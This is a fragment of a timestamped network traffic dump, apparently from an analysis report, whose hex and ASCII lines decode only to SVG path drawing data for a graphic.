                                                                                                                                                                              2023-09-15 05:27:27 UTC1796INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                              Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                              2023-09-15 05:27:27 UTC1812INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                              Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                              2023-09-15 05:27:27 UTC1828INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                              Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                              2023-09-15 05:27:27 UTC1844INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                              Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                              2023-09-15 05:27:27 UTC1860INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                              Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                              2023-09-15 05:27:27 UTC1876INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                              Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                              2023-09-15 05:27:27 UTC1892INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                              Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                              2023-09-15 05:27:27 UTC1908INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                              2023-09-15 05:27:27 UTC1924INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                              Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                              2023-09-15 05:27:27 UTC1940INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                              2023-09-15 05:27:27 UTC1956INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                              Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                              2023-09-15 05:27:27 UTC1972INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                              Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                              2023-09-15 05:27:28 UTC1988INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                              Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                              2023-09-15 05:27:28 UTC2004INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                              Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                              2023-09-15 05:27:28 UTC2020INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                              Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                              2023-09-15 05:27:28 UTC2036INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                              Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                              2023-09-15 05:27:28 UTC2052INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                              Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
